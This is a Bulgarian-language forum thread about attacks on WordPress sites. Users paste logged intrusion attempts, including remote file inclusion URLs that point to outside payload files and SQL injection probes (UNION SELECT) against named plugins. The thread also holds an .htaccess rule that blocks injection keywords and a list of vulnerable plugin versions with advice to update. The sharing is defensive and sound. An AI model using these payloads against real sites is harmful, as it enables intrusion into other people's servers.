Пробиви в сигурността на WP

bgkulinar

Меринджей
Ако имате инсталиран редирекшън плъгин, може да попаднете на следните посетени адреси:

/?sivu=http:​/​/easyman.com.tw​/na3​/​/fxid1.txt??
/?sivu=http:​/​/prety.fileave.com​/id1.txt??
/?rootpath=http:​/​/codemasters.jp​/imgupload​/.injek​/idtempek.txt???
/?rootpath=http:​/​/amazingedu.com​/Web-Lama​/media​/id1.txt?
​/wp-content​/plugins​/wassup​/spy.php?to_date=to_date
/wp-content​/plugins​/st_newsletter​/shiftthis-preview.php?newsletter=-1\'
/wp-content​/plugins​/fgallery​/fim_rss.php?album=-1\'

Всичко това са опити за хакване. Не е много, но е от сърце.
 
Re: Пробиви в сигурността на WP

Репортна ли на създателите на плугина? Иначе ми се струват малко безуспешни 🙂
 
Re: Пробиви в сигурността на WP

Репортна ли на създателите на плугина? Иначе ми се струват малко безуспешни 🙂
Аз не ползвам нито един от плъгините, които са опитани да се хакнат. Все пак си мисля, че първите 4 реда не касаят никой плъгин, а самото ВП.
 
Re: Пробиви в сигурността на WP

Още малко по въпроса:

​/wp-content​/plugins​/wp-cal​/functions​/editevent.php?id=-1'
/wp-content​/plugins​/wp-adserve​/adclick.php?id=-1+union+select+0x6875616B
/wp-content​/plugins​/wordspew​/wordspew-rss.php?id=id'
/wp-content​/plugins​/wordspew​/wordspew-rss.php?id=-998877+UNION+SELECT+0,1,0x6875...
 
Re: Пробиви в сигурността на WP

Е с това много от тия експлоити окапват:

Код:
#Block mySQL injects
RewriteCond %{QUERY_STRING}    ^.*(;|<|>|’|”|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|declare|drop|md5|benchmark).* [NC,OR]
 
Re: Пробиви в сигурността на WP

не са само тези... аз ги следя от колко време... на един мой сайт
Интересното е, какво има в txt файла като се декодира.
В Повечето случаи се опитват да пуснат скрипт, с който да report-нат и изкарат сайта, че има вируси, malware или пък, че е adult и да ви хванат разни филтри.
Като цяло ако са ъпдейтнати блоговете и плъгините мисля, че са ОК нещата.
Аз ги следях доста редовно с redirection-а и баннах доста ip-та (най-много от Корея).
Но сега като допълнение използвам firewall плъгин, който е доста добър и изпра
а email-и при странни querystring-ове.


Това е от мен по темата.
 
Re: Пробиви в сигурността на WP

Plugin WP-Syntax <= 0.9.1 Remote Command Execution
Plugin My Category Order <= 2.8 SQL Injection Vulnerability
Plugin Related Sites 2.1 Blind SQL Injection Vulnerability
Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability
Plugin WP-Forum 1.7.8 Remote SQL Injection Vulnerability
Plugin Page Flip Image Gallery <= 0.2.2 Remote FD Vulnerability
Plugin e-Commerce <= 3.4 Arbitrary File Upload Exploit
Plugin st_newsletter (stnl_iframe.php) SQL Injection Vulnerability
Plugin Download Manager 0.2 Arbitrary File Upload Exploit
Plugin Spreadsheet <= 0.6 SQL Injection Vulnerability
Plugin Download (dl_id) SQL Injection Vulnerability
Plugin Sniplets 1.1.2 (RFI/XSS/RCE) Multiple Vulnerabilities
Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability
Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability
Plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability
MU < 1.3.2 active_plugins option Code Execution Exploit


Малко плъгини за които има опасност от пробив. Ако използвате някои от плъгините по горе е добре да ъпдейтнете към по нова версия или да го спрете. 🙂
 

Back
Горе